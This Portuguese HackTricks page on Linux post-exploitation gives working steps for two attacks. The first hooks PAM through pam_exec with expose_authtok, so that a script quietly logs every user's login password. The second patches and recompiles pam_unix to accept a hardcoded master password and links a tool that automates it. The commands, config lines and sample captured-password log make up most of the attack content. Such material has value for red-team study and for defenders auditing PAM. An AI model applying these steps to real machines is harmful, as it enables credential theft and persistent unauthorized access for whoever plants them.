hacktricks/linux-hardening/linux-post-exploitation/README.md

# Pós-Exploração no Linux

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Capturando Senhas de Login com PAM

Vamos configurar um módulo PAM para registrar cada senha que cada usuário usa para fazer login. Se você não sabe o que é PAM, confira:

{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}

Primeiro, criamos um script bash que será invocado sempre que uma nova autenticação ocorrer.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```
As variáveis são específicas do PAM e ficarão disponíveis por meio do módulo `pam_exec.so`.

Aqui está o significado das variáveis:

* **$PAM\_USER:** O nome de usuário que foi inserido.
* **$PAM\_RHOST:** O host remoto (tipicamente o endereço IP)
* **$(cat -):** Isso lê `stdin`, e conterá a senha que o script captura
* Os resultados são encaminhados para um arquivo de log em `/var/log/toomanysecrets.log`

Para **impedir que todos os usuários leiam** o arquivo, considere criá-lo previamente e executar `chmod`, por exemplo:
```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
```
Em seguida, o arquivo de configuração PAM precisa ser atualizado; o módulo `pam_exec` será usado para invocar o script.

Existem vários arquivos de configuração localizados em `/etc/pam.d/`, e escolhemos `common-auth`.
```
sudo nano /etc/pam.d/common-auth
```
No final do arquivo, adicione o seguinte módulo de autenticação:

`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`

As opções têm os seguintes significados:

* **optional:** A autenticação não deve falhar se houver um erro (não é um passo obrigatório)
* **pam\_exec.so:** Este é o módulo PAM "living off the land" que pode invocar scripts arbitrários
* **expose\_authtok:** Este é o truque que permite ler a senha via `stdin`
* **quiet:** Não mostrar nenhum erro ao usuário (se algo não funcionar)
* O último argumento é o script shell que foi criado anteriormente

![](<../../.gitbook/assets/image (375).png>)

Finalmente, torne o arquivo executável:

`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`

Agora, vamos testar isso e fazer ssh de outra máquina, ou fazer login localmente.

E então olhe para o arquivo de log:
```
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
```
### Backdoor no PAM

Vamos até as fontes do PAM (depende da sua distribuição, pegue o mesmo número de versão que o seu...) e observe em torno das linhas 170/180 no arquivo pam_unix_auth.c:
```
vi modules/pam_unix/pam_unix_auth.c
```
```markdown
![](<../../.gitbook/assets/image (651).png>)

Vamos mudar isso por:

![](<../../.gitbook/assets/image (638) (2) (2).png>)

Isso permitirá que qualquer usuário usando a **senha "0xMitsurugi"** faça login.

Recompile o `pam_unix_auth.c`, e substitua o arquivo pam_unix.so:
```
```bash
make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/
```
{% hint style="info" %}
Você pode automatizar esse processo com [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
{% endhint %}

## Referências

* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)
* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo do [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>